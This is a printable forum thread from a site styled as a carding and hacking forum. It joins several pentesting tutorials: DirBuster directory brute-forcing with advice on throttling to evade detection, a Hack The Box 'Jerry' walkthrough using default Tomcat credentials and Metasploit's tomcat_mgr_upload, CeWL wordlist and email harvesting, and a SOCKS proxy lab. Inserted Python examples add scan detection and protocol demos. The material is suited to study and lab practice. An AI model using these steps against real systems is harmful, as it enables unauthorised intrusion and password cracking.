Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] Comprehensive Guide on Dirbuster Tool - Printable Version




[Guide] Comprehensive Guide on Dirbuster Tool - NINZA - 05-14-2020

In this article we focus on directory enumeration with the Kali Linux tool DirBuster, trying to find hidden files and directories on a web server.
Table of Content
  • What is DirBuster
  • Default Mode
  • GET Request Method
  • Pure Brute Force (Numeric)
  • Single Sweep (Non-recursive)
  • Targeted Start
  • Blank Extensions
  • Search by File Type (.txt)
  • Changing the DIR List
  • Following Redirects
  • Attack Through Proxy
  • Adding File Extensions
  • Evading Detective Measures (Requests Per Second)
What is DirBuster
DirBuster is an application within the Kali arsenal that is designed to brute force web and application servers. The tool can brute force directories and files. The application lets users take advantage of multi-thread functionality to get things moving faster. In this article, we will give you an overview of the tool and its basic functions.
Default Mode
We start DirBuster and enter only the target URL in the target URL field. Leave the rest of the options as they are. DirBuster will now auto-switch between HEAD and GET requests to perform a list-based brute force attack.

[Image: 1.png?w=687&ssl=1]
Let’s hit Start. DirBuster gets to work and starts brute forcing and we see various files and directories popping up in the result window.
[Image: 2.png?w=687&ssl=1]
GET Request Method
We will now set DirBuster to only use the GET request method. To make things go a little faster, the thread count is set to 200 and the “Go Faster” checkbox is checked.
[Image: 3.png?w=687&ssl=1]
In the Results – Tree View we can see findings.
[Image: 4.png?w=687&ssl=1]
Pure Brute Force (Numeric)
DirBuster allows a lot of control over the attack process; in this step we will use only numerals to perform a pure brute force attack. This is done by selecting “Pure Brute Force” in the scanning type option and selecting “0-9” in the charset drop-down menu. By default, the minimum and maximum character limits are already set.
[Image: 5.png?w=687&ssl=1]
In the Results – Tree View we can see findings.
[Image: 6.png?w=687&ssl=1]
Single Sweep (Non-recursive)
We will now perform a single sweep brute force where the dictionary words are used only once. To achieve this, we will unselect the “Be Recursive” checkbox.
[Image: 7.png?w=687&ssl=1]
In the Results – ListView we can see findings.
[Image: 8.png?w=687&ssl=1]
Targeted Start
Further exploring the control options provided by DirBuster, we will set it up to start looking from the “admin” directory. In the “Dir to start with” field, type “/admin” and hit start.
[Image: 9.png?w=687&ssl=1]
In the Results – Tree View we can see findings.
[Image: 10.png?w=687&ssl=1]
Blank Extensions
DirBuster can also look for directories with a blank extension, which could uncover data that might otherwise be left untouched. All we do is check the “Use Blank Extension” checkbox.
[Image: 11.png?w=687&ssl=1]
We can see the processing happen and DirBuster testing to find directories with blank extensions.
[Image: 12.png?w=687&ssl=1]
Search by File Type (.txt)
We will be setting the file extension type to .txt, by doing so, DirBuster will look specifically for files with a .txt extension. Type “.txt” in the File extension field and hit start.
[Image: 13.png?w=687&ssl=1]
We can see the processing happen and DirBuster testing to find directories with a .txt extension.
[Image: 14.png?w=687&ssl=1]
Changing the DIR List
We will now be changing the directory list in DirBuster. Options > Advanced Options > DirBuster Options > Dir list to use. Here is where we can browse and change the list to “directory-list-2.3-medium.txt”, found at /usr/share/dirbuster/wordlists/ in Kali.
[Image: 15.png?w=687&ssl=1]
We can see the word list is now set.
[Image: 16.png?w=687&ssl=1]
Following Redirects
DirBuster by default is not set to follow redirects during the attack, but we can enable this option under Options > Follow Redirects.
[Image: 17.1.png?w=687&ssl=1]
We can see the results in the scan information as the test progresses.
[Image: 17.png?w=687&ssl=1]
Results in the Tree View.
[Image: 18.png?w=687&ssl=1]
Attack through Proxy
DirBuster can also attack using a proxy. In this scenario, we try to open a webpage at 192.168.1.108 but are denied access.
[Image: 21.png?w=687&ssl=1]
We set the IP in DirBuster as the attack target.
[Image: 22.png?w=687&ssl=1]
Before we start the attack, we set up the proxy option under Options > Advanced Options > Http Options. Here we check the “Run through a proxy” checkbox, input the IP 192.168.1.108 in the Host field and set the port to 3129.
[Image: 23.png?w=687&ssl=1]
We can see the test showing results.
[Image: 24.png?w=687&ssl=1]
Adding File Extensions
Some file extensions are not set to be searched for in DirBuster, mostly image formats. We can add these to be searched for by navigating to Options > Advanced Options > HTML Parsing Options.
[Image: 25.png?w=687&ssl=1]
We will delete jpeg in this instance and click OK.
[Image: 26.png?w=687&ssl=1]
In the File Extension field we type “jpeg” to explicitly tell DirBuster to look for .jpeg files.
[Image: 27.png?w=687&ssl=1]
We can see in the testing process, DirBuster is looking for and finding jpeg files.
[Image: 28.png?w=687&ssl=1]
Evading Detective Measures
Exceeding the expected number of requests per second during an attack is a sure way to get flagged by any detective measures in place. DirBuster lets us throttle the requests per second to stay under that threshold. Options > Advanced Options > Scan Options is where we can enable this setting.
[Image: 29.png?w=687&ssl=1]
We set Connection Time Out to 500, check “Limit number of requests per second” and set that field to 20.
[Image: 30.png?w=687&ssl=1]
Once the test is initiated, we will see the results. The scan was stopped to show the initial findings.
[Image: 31.png?w=687&ssl=1]
Once the scan is complete the actual findings can be seen.
[Image: 32.png?w=687&ssl=1]
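Added example (not from the original article): the defender’s side of the requests-per-second setting above. This Python script parses Apache/Nginx combined-format access log lines, constructed here for the example, and flags a client whose requests cluster in a short window and mostly return 404. That is what a wordlist scan looks like even when it is throttled to 20 requests per second as above: the rate limit lowers the burst, not the miss ratio. The thresholds, sample addresses and the user-agent string are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/Nginx "combined" log format; the request line is split into method and path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforcers(lines, window=timedelta(seconds=60), min_requests=10, min_miss_ratio=0.5):
    """Return {ip: summary} for clients whose traffic looks like a directory wordlist scan.

    A client is flagged when at least `min_requests` of its requests fall inside one
    sliding `window` AND at least `min_miss_ratio` of all its requests returned 404.
    Normal browsing rarely meets both; a wordlist scan meets both even when throttled,
    because almost every guessed path does not exist.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        peak, start = 0, 0  # largest number of requests inside any single window
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        misses = sum(1 for r in recs if r["status"] == 404)
        ratio = misses / len(recs)
        if peak >= min_requests and ratio >= min_miss_ratio:
            flagged[ip] = {
                "requests": len(recs),
                "peak_per_window": peak,
                "not_found_ratio": round(ratio, 2),
                "user_agents": sorted({r["ua"] for r in recs}),
            }
    return flagged


# --- Constructed sample log (not real traffic; addresses and UA are made up) ----
_BASE = datetime(2020, 5, 14, 10, 0, 0, tzinfo=timezone.utc)


def _line(ip, secs, method, path, status, ua):
    """Build one constructed log line `secs` seconds after the base timestamp."""
    ts = (_BASE + timedelta(seconds=secs)).strftime(TS_FORMAT)
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"'


GUESSED_PATHS = ["/admin", "/backup", "/config", "/test", "/old", "/tmp",
                 "/images", "/cgi-bin", "/login", "/db", "/uploads"]

SAMPLE_LOG = [
    # An ordinary visitor: a few pages over 40 seconds, one broken image link.
    _line("192.168.1.50", 1, "GET", "/", 200, "Mozilla/5.0"),
    _line("192.168.1.50", 4, "GET", "/about", 200, "Mozilla/5.0"),
    _line("192.168.1.50", 9, "GET", "/contact", 200, "Mozilla/5.0"),
    _line("192.168.1.50", 40, "GET", "/images/logo.png", 404, "Mozilla/5.0"),
] + [
    # A scanner throttled to a few requests per second: 11 guesses in about 3 seconds,
    # of which only /images exists.
    _line("192.168.1.77", 20 + i * 0.3, "HEAD", p, 200 if p == "/images" else 404,
          "DirBuster-1.0-RC1")
    for i, p in enumerate(GUESSED_PATHS)
]

if __name__ == "__main__":
    for ip, summary in find_bruteforcers(SAMPLE_LOG).items():
        print(ip, summary)
```

Lowering `min_requests` does not make the ordinary visitor trip the rule, because its 404 ratio stays low; the two conditions together are what separate a scan from a user following a broken link.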
We hope you enjoy using this tool. It is a great tool that’s a must in a pentester’s arsenal.
Stay tuned for more articles on the latest and greatest in hacking.

Hello CTF Crackers!! Today we are going to capture the flag on a challenge named “Jerry”, which is available online for those who want to improve their skills in penetration testing and black box testing. Jerry is a retired vulnerable lab presented by Hack The Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.

Level: Easy
Flags: There are two flags. (user.txt & root.txt)
IP Address: 10.10.10.95
Penetrating Methodologies
  • Port scanning and IP discovery
  • Browsing the IP on port 8080
  • Enumerating served webpage
  • Getting Login Credentials
  • Attacking using Metasploit
  • Getting root Access
  • Reading the flags
Walkthrough
Since these labs are available online via VPN, they have a static IP address. The IP address of Jerry is 10.10.10.95.
Let’s start off by scanning the network to find our target:
nmap -sV 10.10.10.95

[Image: 1.png?w=687&ssl=1]
Here we notice a very interesting result from the nmap scan: it shows port 8080 open for Apache Tomcat/Coyote JSP Engine 1.1.
Next order of business is to browse the IP on a Web Browser.
[Image: 2.png?w=687&ssl=1]
On opening the IP in the web browser, we are greeted with the default Tomcat page. After some enumeration here and there, we found the “Manager App” link. Upon clicking this link, we are presented with a login form as shown below.
[Image: 3.png?w=687&ssl=1]
Here, after some tweaking with passwords and other things, we found that clicking the “Cancel” button triggers a 401 error as shown in the image.
[Image: 4.png?w=687&ssl=1]
After closely reading the example on the webpage provided, we got the Login Credentials.
User: tomcat
Password: s3cret

It’s time to attack using the Swiss army knife of any penetration tester, “Metasploit”.
After doing some research and some tries, it was clear that we can use the tomcat_mgr_upload exploit.
So, let’s do this:
msf> use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf exploit(multi/http/tomcat_mgr_upload) > exploit

As shown in the image below, the exploit runs successfully and gives a meterpreter session with elevated privileges.
We traverse the directories to find the flag using commands like “ls” and “cd”.
[Image: 5.png?w=687&ssl=1]
After a little enumeration we get to the C:\Users directory. Here we come across the Administrator directory, so we move into it, and then into the Desktop directory.
This gives us the flags directory, which contains a text file named “2 for the price of 1”. On opening it, we get both the user and the root flag.
[Image: 6.png?w=687&ssl=1]

Hello Friends!! In this article, we are focusing on Generating Wordlist using Kali Linux tool Cewl and learn more about its available options.
Table of Content
  • Introduction to Cewl
  • Default Method
  • Save Wordlist in a file
  • Generating Wordlist of Specific Length
  • Retrieving Emails from a Website
  • Count the number of Word Repeated in a website
  • Increase the Depth to Spider
  • Extra Debug Information
  • Verbose Mode
  • Generating Alpha-Numeric
  • Cewl with Digest/Basic Authentication
  • Proxy URL
Introduction to Cewl
CeWL is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same metadata extraction techniques to create author/creator lists from already downloaded.
Source: CeWL project page.

Type “cewl -h” in the terminal, it will dump all the available options it accepts along with their respective description.
SYNTAX: cewl <url> [options]
General Options
    -h, --help:                Show help.
    -k, --keep:                Keep the downloaded file.
    -d <x>, --depth <x>:       Depth to spider to, default 2.
    -m, --min_word_length:     Minimum word length, default 3.
    -o, --offsite:             Let the spider visit other sites.
    -w, --write:               Write the output to the file.
    -u, --ua <agent>:          User agent to send.
    -n, --no-words:            Don’t output the wordlist.
    --with-numbers:            Accept words with numbers in as well as just letters.
    -a, --meta:                Include meta data.
    --meta_file <file>:        Output file for meta data.
    -e, --email:               Include email addresses.
    --email_file <file>:       Output file for email addresses.
    --meta-temp-dir <dir>:     The temporary directory used by exiftool when parsing files, default /tmp.
    -c, --count:               Show the count for each word found.
    -v, --verbose:             Verbose.
    --debug:                   Extra debug information.
Authentication
    --auth_type:               Digest or basic.
    --auth_user:               Authentication username.
    --auth_pass:               Authentication password.
Proxy Support
    --proxy_host:              Proxy host.
    --proxy_port:              Proxy port, default 8080.
    --proxy_username:          Username for proxy, if required.
    --proxy_password:          Password for proxy, if required.
[Image: 1.png?w=687&ssl=1]
Default Method
Enter the following command which spiders the given URL to a specified depth and prints a list of words which can then be used as a dictionary for cracking the password.
cewl <url>
[Image: 2.png?w=687&ssl=1]
Save Wordlist in a file
For record keeping, better readability and future reference, we save the printed word list to a file. To do this we use the -w parameter to write the output to a text file.
cewl <url> -w dict.txt

Now that the command has executed successfully, let’s go to the output location to check whether the output was saved to the file or not. In this case, our output location is /root/dict.txt.
cat dict.txt

[Image: 3.png?w=687&ssl=1]
Generating Wordlist of Specific Length
If you want to generate a wordlist with a minimum word length, use the -m option, which sets the minimum word length parameter.
cewl <url> -m 9

The above command generates a list of words of at least 9 characters; as you can observe in the following image, it has crawled the given website and printed the words with a minimum of 9 characters.
[Image: 4.png?w=687&ssl=1]
Retrieving Emails from a Website
You can use the -e option, which enables email extraction, along with the -n option, which hides the word list generated while crawling the given website.
cewl <url> -n -e

As shown in the below image, it has successfully found 1 email-id from inside the website.
[Image: 5.png?w=687&ssl=1]
Count the number of Word Repeated in a website
If you want to count how many times each word is repeated on a website, use the -c option, which enables the count parameter.
cewl <url> -c

As you can observe in the image below, it has printed the count for each word repeated on the given website.
[Image: 6.png?w=687&ssl=1]
Increase the Depth to Spider
If you want to increase the spidering depth to generate a larger word list by enumerating more new words from the website, use the -d option with a depth level number, which sets the depth parameter for more intensive crawling. By default the depth level is set to 2.
cewl <url> -d 3

[Image: 7.png?w=687&ssl=1]
Extra Debug Information
You can use the --debug option, which enables debug mode and shows errors and raw details of the website while crawling.
cewl <url> --debug

[Image: 8.png?w=687&ssl=1]
Verbose Mode
To expand the crawling result and retrieve complete details of a website, use the -v option for verbose mode. Rather than only generating a wordlist, it dumps the information available on the website.
cewl <url> -v

[Image: 10.png?w=687&ssl=1]
Generating Alpha-Numeric
If you want to generate an alpha-numeric wordlist, use the --with-numbers option along with the command.
cewl <url> --with-numbers

[Image: 13.png?w=687&ssl=1]
From the given below image you can observe, this time it has generated an alpha-numeric wordlist.
[Image: 14.png?w=687&ssl=1]
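Added example, not CeWL’s own code: a small Python re-implementation of what the -d, -m, -c, -e and --with-numbers options above do, run against a constructed four-page site held in memory so it works offline. It shows why words from an organisation’s public pages belong in a password-policy blocklist: any visible text, title included, ends up in the candidate list, while script and style contents do not. The site contents, host names and addresses are all made up for the example.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _PageParser(HTMLParser):
    """Collect visible text and hyperlinks; text inside <script>/<style> is ignored."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def parse_page(html):
    p = _PageParser()
    p.feed(html)
    return " ".join(p.chunks), p.links


WORD_RE = re.compile(r"[A-Za-z]+")        # default: letters only
ALNUM_RE = re.compile(r"[A-Za-z0-9]+")    # --with-numbers
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def spider(pages, start, depth=2, offsite=False):
    """Breadth-first crawl over an in-memory site {url: html}; depth counts link hops (-d)."""
    hops = {start: 0}
    queue = [start]
    while queue:
        url = queue.pop(0)
        if url not in pages or hops[url] >= depth:
            continue
        _, links = parse_page(pages[url])
        for href in links:
            nxt = urljoin(url, href)
            if not offsite and urlparse(nxt).netloc != urlparse(start).netloc:
                continue  # without -o/--offsite, stay on the starting host
            if nxt not in hops:
                hops[nxt] = hops[url] + 1
                queue.append(nxt)
    return [u for u in hops if u in pages]


def build_wordlist(pages, start, depth=2, min_length=3, with_numbers=False):
    """Return (Counter of words, sorted emails): the -c counts, -m filter and -e addresses."""
    rx = ALNUM_RE if with_numbers else WORD_RE
    words, emails = Counter(), set()
    for url in spider(pages, start, depth):
        html = pages[url]
        text, _ = parse_page(html)
        words.update(w for w in rx.findall(text) if len(w) >= min_length)
        emails.update(EMAIL_RE.findall(html))
    return words, sorted(emails)


# Constructed four-page site used as offline input (fictional company and people).
SITE = {
    "http://example.test/": """<html><head><title>Acme Widgets</title>
        <style>body { color: red }</style></head><body>
        <h1>Welcome to Acme Widgets</h1>
        <p>Contact alice@example.test for Training2020 schedules.</p>
        <a href="/about">About</a> <a href="/team">Team</a>
        <a href="http://other.test/">Partner</a>
        <script>var notaword = 1;</script></body></html>""",
    "http://example.test/about": """<html><body>
        <p>Acme Widgets delivers security training and penetration testing.</p>
        <a href="/contact">Contact</a></body></html>""",
    "http://example.test/team": "<html><body><p>Our team: Alice, Bob and Carol.</p></body></html>",
    "http://example.test/contact": "<html><body><p>Email hr@example.test. Phone 555-0100.</p></body></html>",
}

if __name__ == "__main__":
    words, emails = build_wordlist(SITE, "http://example.test/")
    for word, count in words.most_common(5):
        print(count, word)
    print("emails:", emails)
```

With the default depth of 2 the crawl reaches all four pages; with depth 1 the contact page (two hops from the start) is never fetched, which is the effect the -d section above describes.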
Cewl with Digest/Basic Authentication
If the website requires authentication to log in, the default command above will not work properly; in order to generate a wordlist you need to get past the authentication page by supplying credentials with the following parameters:
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.
cewl <url> --auth_type Digest --auth_user admin --auth_pass password -v

or
cewl <url> --auth_type basic --auth_user admin --auth_pass password -v

From the image below you can observe that it got HTTP response 200 and hence generated the wordlist.
[Image: 15.png?w=687&ssl=1]
Proxy URL
When a website is running behind a proxy server, cewl will not be able to generate a wordlist with the default command, as shown in the image below.
cewl -w dict.txt <url>

You can use the --proxy_host and --proxy_port options to set the proxy parameters and generate a wordlist with the following command:
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt <url>

As you can observe in the image below, after executing the second command it has successfully printed the word list as output.
[Image: 17.png?w=687&ssl=1]

Hello friends!! Following on from our previous article, today we are going to set up a SOCKS proxy to use as a proxy server on Ubuntu/Debian machines and will try to penetrate it.

Table of Content
  • Introduction to proxy
  • What is socks proxy
  • Difference Between Socks proxy and HTTP Proxy
  • Socks proxy Installation
  • Connecting HTTP via Proxy
  • Connecting SSH via Proxy
  • Connecting FTP via Proxy
Introduction to Proxy
A proxy is a computer system or program that acts as a middle-man or intermediary between your web browser and another computer. Your ISP operates servers, computers designed to deliver information to other computers, and uses proxy servers to accelerate the transfer of information between the server and your computer.
For example, if two users, say A and B, both request the same website from the server, then instead of retrieving the data from the original server the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.
What is SOCKS Proxy?
A SOCKS server is an all-purpose proxy server that creates a TCP connection to another server on the client’s behalf, then exchanges network packets between a client and server. The Tor onion proxy software serves a SOCKS interface to its clients. Even SSH tunnel makes all the connections as per the SOCKS protocol.
For high security, you can go with SOCKS5 protocol that provides various authentication options which you cannot get with the SOCKS4 protocol.
Difference Between Socks proxy and HTTP Proxy
  • SOCKS proxies are low-level: designed as a general proxy able to accommodate effectively any protocol, program or type of traffic.
  • SOCKS proxies support both TCP and UDP transport protocols.
  • SOCKS operates at Layer 5 (the session layer) of the OSI model.
  • A SOCKS server accepts incoming client connections on TCP port 1080.
  • HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections.
  • HTTP proxies are high-level: designed for a specific protocol.
  • HTTP proxies can only process requests from applications that use the HTTP protocol.
  • An HTTP proxy is for proxying HTTP or web traffic at Layer 7.
  • An HTTP proxy typically accepts incoming client connections on port 3128.
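Added example, not part of the original article and not microsocks code: the SOCKS5 exchange described above (RFC 1928, with the RFC 1929 username/password method that SOCKS4 lacks) carried out in memory with both the client’s and the server’s messages built and parsed as raw bytes. It shows the method negotiation that makes a no-auth server like the `microsocks -p 1080` setup below answer `05 00`, a server requiring credentials answer `05 02`, and a client that cannot offer the required method get `05 FF`; the CONNECT step then shows where a server applies its own ruleset (reply `02`, “connection not allowed”). The credentials, the allowed-port set and the target 192.168.1.103:22 are assumptions made for the example.

```python
import hmac
import ipaddress
import struct

# Constants from RFC 1928 (SOCKS5) and RFC 1929 (username/password sub-negotiation).
VER, RSV = 0x05, 0x00
NO_AUTH, USER_PASS, NO_ACCEPTABLE = 0x00, 0x02, 0xFF
CMD_CONNECT, ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x01, 0x03
REP_OK, REP_NOT_ALLOWED = 0x00, 0x02


# ---- client side -----------------------------------------------------------
def client_greeting(methods):
    """VER | NMETHODS | METHODS: the client lists the auth methods it supports."""
    return bytes([VER, len(methods), *methods])


def client_userpass(user, password):
    """RFC 1929: VER(0x01) | ULEN | UNAME | PLEN | PASSWD, sent only if the server chose 0x02."""
    u, p = user.encode(), password.encode()
    return bytes([0x01, len(u)]) + u + bytes([len(p)]) + p


def client_connect(host, port):
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT for a CONNECT to host:port."""
    try:
        body = bytes([ATYP_IPV4]) + ipaddress.IPv4Address(host).packed
    except ValueError:  # not a dotted quad: send a length-prefixed domain name
        name = host.encode()
        body = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([VER, CMD_CONNECT, RSV]) + body + struct.pack("!H", port)


# ---- server side -----------------------------------------------------------
def server_select_method(greeting, require_auth):
    """Choose username/password if auth is required, else no-auth; 0xFF if the client lacks it."""
    if len(greeting) < 2 or greeting[0] != VER:
        raise ValueError("not a SOCKS5 greeting")
    offered = greeting[2:2 + greeting[1]]
    wanted = USER_PASS if require_auth else NO_AUTH
    return bytes([VER, wanted if wanted in offered else NO_ACCEPTABLE])


def server_check_userpass(msg, credentials):
    """Verify the RFC 1929 message against {user: password}; status 0x00 means success."""
    if msg[0] != 0x01:
        raise ValueError("bad sub-negotiation version")
    ulen = msg[1]
    user = msg[2:2 + ulen].decode()
    plen = msg[2 + ulen]
    password = msg[3 + ulen:3 + ulen + plen].decode()
    ok = hmac.compare_digest(credentials.get(user, ""), password)
    return bytes([0x01, 0x00 if ok else 0x01])


def server_handle_connect(req, allowed_ports):
    """Parse a CONNECT request; answer REP_OK or 'connection not allowed by ruleset'."""
    if req[0] != VER or req[1] != CMD_CONNECT:
        raise ValueError("unsupported request")
    atyp = req[3]
    if atyp == ATYP_IPV4:
        host, rest = str(ipaddress.IPv4Address(req[4:8])), req[8:]
    elif atyp == ATYP_DOMAIN:
        n = req[4]
        host, rest = req[5:5 + n].decode(), req[5 + n:]
    else:
        raise ValueError("unsupported address type")
    port = struct.unpack("!H", rest[:2])[0]
    rep = REP_OK if port in allowed_ports else REP_NOT_ALLOWED
    # BND.ADDR/BND.PORT would describe the socket the server opened; none is opened here.
    return bytes([VER, rep, RSV, ATYP_IPV4]) + bytes(4) + struct.pack("!H", 0), (host, port)


def negotiate(require_auth, credentials, user=None, password=None,
              host="192.168.1.103", port=22, allowed_ports=frozenset({21, 22, 80})):
    """Run the full exchange in memory; returns the outcome plus every message sent."""
    transcript = []
    greeting = client_greeting([NO_AUTH, USER_PASS] if user else [NO_AUTH])
    transcript.append(("client", greeting))
    choice = server_select_method(greeting, require_auth)
    transcript.append(("server", choice))
    method = choice[1]
    result = {"method": method, "connected": False, "transcript": transcript}
    if method == NO_ACCEPTABLE:
        return result  # the server closes the connection at this point
    if method == USER_PASS:
        auth = client_userpass(user, password)
        transcript.append(("client", auth))
        verdict = server_check_userpass(auth, credentials)
        transcript.append(("server", verdict))
        if verdict[1] != 0x00:
            return result
    req = client_connect(host, port)
    transcript.append(("client", req))
    reply, target = server_handle_connect(req, allowed_ports)
    transcript.append(("server", reply))
    result.update(connected=reply[1] == REP_OK, target=target)
    return result


if __name__ == "__main__":
    for side, msg in negotiate(True, {"alice": "s3cret"}, "alice", "s3cret")["transcript"]:
        print(f"{side:6} {msg.hex(' ')}")
```

The credentials travel in clear text in the RFC 1929 message, which is why a SOCKS5 server with authentication is usually reached over an SSH tunnel or a trusted LAN segment, as in the lab layout below.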
Socks Proxy Installation
For the SOCKS proxy lab set-up we are going to download microsocks from GitHub. MicroSocks is a multithreaded, small, efficient SOCKS5 server. It is very lightweight and very light on resources: for every client, a thread with a stack size of 8KB is spawned.
Let’s start!!
Open the terminal with sudo rights and enter the following command:
git clone <microsocks repository URL>
[Image: 1.png?w=687]
Once downloading is completed run the following command for its installation:
cd microsocks
apt install gcc
make
make install

[Image: 2.png?w=687]
Now execute the following command to run socks proxy on port 1080 without authentication.
microsocks -p 1080

[Image: 3.png?w=687]
As you can observe, FTP, SSH, HTTP and SOCKS are running on our local machine. Now let’s test the SOCKS proxy against various protocols to confirm whether it is an all-purpose proxy, as claimed above.
Connecting HTTP via Proxy
Now we configure the Apache service for the web proxy: open the “000-default.conf” file at /etc/apache2/sites-available/ and add the following lines, which apply these rules to the /html directory for localhost or the machine IP (192.168.1.103).
<Directory /var/www/html/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        # Order/deny/allow is Apache 2.2 syntax; Apache 2.4 only honours it with mod_access_compat loaded
        Order deny,allow
        deny from all
        allow from 127.0.0.1 192.168.1.103
</Directory>

Now save the file and start (or restart) the Apache service with the following command.
service apache2 start

[Image: 5.png?w=687]
Now when someone tries to access web services on our network, i.e. 192.168.1.103, they are greeted with the following web page:
“Error 403 Forbidden: You don’t have permission to access <requested page>”.
When you face a situation where port 80 is open but you are unable to access it, that indicates the network is running behind a proxy server.
[Image: 6.png?w=687]
For web proxy penetration testing we had already set up a lab with a web application server such as DVWA (see our earlier DVWA setup article).

Now, to test whether our proxy server is working, let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings, select “Manual proxy configuration” and enter the SOCKS proxy server IP address (192.168.1.103) and port (1080) to be used for all protocols.
[Image: 7.png?w=687]
BOOMMM!! Connected to the Proxy server successfully using HTTP Proxy in our Browser.
[Image: 8.png?w=687]
Connecting SSH via Proxy
Now we configure the hosts.allow file for the SSH proxy: open /etc/hosts.allow and add the following lines to allow SSH connections from the localhost IP and deny everyone else.
sshd : localhost : allow
sshd : 192.168.1.103 : allow
sshd : ALL : deny

[Image: 9.1.png?w=687]
Now open a proxychains configuration file from the given path /etc/proxychains.conf in your Kali Linux and then add the following line at the bottom.
socks5 192.168.1.103 1080

[Image: 9.png?w=687]
Now when we try to connect to the target machine on port 22 for an SSH connection, we get the error message “Connection reset by peer”, as shown in the image below after executing the first command.
ssh [email protected]

When you face a situation where port 22 is open but you are unable to access it, that indicates the network is running behind the proxy server.
But if you use proxychains with the command, after saving the configuration as described above, you can easily connect to the target network on port 22 for an SSH connection, as shown in the image below after executing the second command.
proxychains ssh [email protected]

[Image: 10.png?w=687]
Connecting FTP via Proxy
For connecting to FTP via the proxy we have used ProFTPD, so you can install it with the following command:
apt-get install proftpd

Now we configure ProFTPD for the FTP proxy: open /etc/proftpd/proftpd.conf and add the following lines to allow FTP connections from the localhost IP and restrict other networks.
<Limit LOGIN>
Order Allow,Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all
</Limit>

[Image: 11.png?w=687]
Using FileZilla, when we try to connect to 192.168.1.103 on port 21 to access the FTP service, we get the error “Connection closed by server”.
When you face a situation where port 21 is open but you are unable to access it, that indicates the network is running behind a proxy server.
[Image: 12.1.png?w=687]
But FileZilla offers a generic proxy option, which forces passive mode on the FTP connection. Go to Settings > Connection > FTP, select the “generic proxy” option and make the following configuration settings.
  • Choose SOCKS 5 as generic Proxy
  • Proxy HOST IP: 192.168.1.103
  • Proxy Port: 1080
[Image: 14.png?w=687]
Now when you try again to connect to the target machine on port 21 to access the FTP service, you will be able to reach it easily, as shown in the last image.
Hence it is proved that SOCKS really is an all-purpose proxy server. Hopefully you have found this article helpful and now fully understand the working of a proxy server and the related topics covered here.
[Image: 15.png?w=687]